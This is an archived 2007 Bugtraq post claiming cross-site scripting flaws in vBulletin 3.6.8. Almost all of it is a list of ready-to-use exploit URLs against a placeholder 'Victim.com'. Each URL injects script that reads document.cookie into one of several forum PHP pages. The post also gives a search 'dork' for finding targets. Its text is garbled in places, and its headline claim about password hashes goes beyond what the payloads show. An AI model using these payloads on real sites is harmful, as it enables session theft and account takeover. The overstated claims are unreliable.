lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070817105604.27367.qmail@securityfocus.com> Date: 17 Aug 2007 10:56:04 -0000 From: RaeD@...Mail.Com To: bugtraq@...urityfocus.com Subject: vBulletin V3.6.8 XSS Password Md5 Hash #Discovred By : Hasadya Raed ---------------- #Contact : RaeD@...Mail.Cpm ---------------- #Script: vBulletin V3.6.8ulletin V3.6.8 ---------------- #Dork: vBulletin V3.6.8ulletin V3.6.8 ---------------- #Exploit : http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8ulletin V3.6.8/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=1 http://www.Victim.com/vBulletin V3.6.8/index.php?s=<script>alert('document.cookie')</script> http://www.Victim.com/vBulletin V3.6.8/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/forumdisplay.php?f=2"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0 http://www.Victim.com/vBulletin V3.6.8/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=all&titlesonly=0